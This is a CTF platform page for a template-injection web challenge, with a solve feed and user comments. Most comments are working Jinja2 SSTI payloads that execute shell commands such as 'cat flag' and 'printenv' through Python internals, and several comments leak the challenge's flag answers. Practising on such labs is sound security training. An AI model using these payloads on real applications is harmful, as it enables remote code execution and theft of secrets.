Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
15913
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
nina123 攻破了该题 1天前
33538626867 攻破了该题 1天前
qgys 攻破了该题 2天前
19189756057 攻破了该题 3天前
吃个大西瓜 攻破了该题 3天前
wywfzy 攻破了该题 4天前
wangzhuo 攻破了该题 4天前
当心眼睛 攻破了该题 5天前
小手冰凉 攻破了该题 6天前
c2F1eQ 攻破了该题 7天前
2183919422 攻破了该题 8天前
11111in 攻破了该题 8天前
lvxiaobu 攻破了该题 10天前
lulai 攻破了该题 10天前
Qiuqiu426 攻破了该题 11天前
13990684015 攻破了该题 15天前
3177919928 攻破了该题 15天前
ch2025 攻破了该题 15天前
VFlame 攻破了该题 15天前
评论
hao7 4月前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
超爱西西鸭 6月前
举报
/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
pettter 7月前
举报
?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}
不会写代码的菜鸟 8月前
举报
大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀
qingchuan 7月前
举报
因为没有import os,os是未定义的
q1152874733 8月前
举报
http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}
Royic 9月前
举报
/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}
sz007 9月前
举报
flag{6c85015e98aa08e245d15289704dfd8b}
如你所愿 9月前
举报
flag{5566f3c3cc3821f4a768384d2a387aae}
109349 9月前
举报
flag{2682096b09e88fe5f1faee731c0d36d7}
z0shell 10月前
举报
/?flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read()}}
Masterk 9月前
举报
这是怎么想出来的。。